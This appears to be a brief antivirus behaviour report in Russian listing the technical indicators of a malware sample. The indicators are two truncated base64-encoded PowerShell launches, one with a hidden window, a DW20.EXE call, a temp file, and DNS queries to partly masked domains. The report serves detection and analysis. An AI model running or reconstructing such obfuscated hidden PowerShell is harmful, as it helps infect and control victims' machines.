Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEEAQQBjAEcAQQBRAHcAIAA9ACAAJwA1ADIAOAAnADsAJABqAEEARABvAEIAbwBCAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAawAxAEIAJwAsACcAWQAnACwAJwBEAFEAdwBBACcAKQA7ACQAWQBVAFEAQgB4AF8AVQA9ACQAZQBuAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\795027.cvr
- DNS ASK ha#####lifestore.com
- DNS ASK ne###xtrade.com
- DNS ASK el####pparel.com
- DNS ASK su####sworth.com
- DNS ASK ga#######rsrepairraleigh.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEEAQQBjAEcAQQBRAHcAIAA9ACAAJwA1ADIAOAAnADsAJABqAEEARABvAEIAbwBCAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAawAxAEIAJwAsACcAWQAnACwAJwBEAFEAdwBBACcAKQA7ACQAWQBVAFEAQgB4AF8AVQA9ACQAZQBuAH...' (со скрытым окном)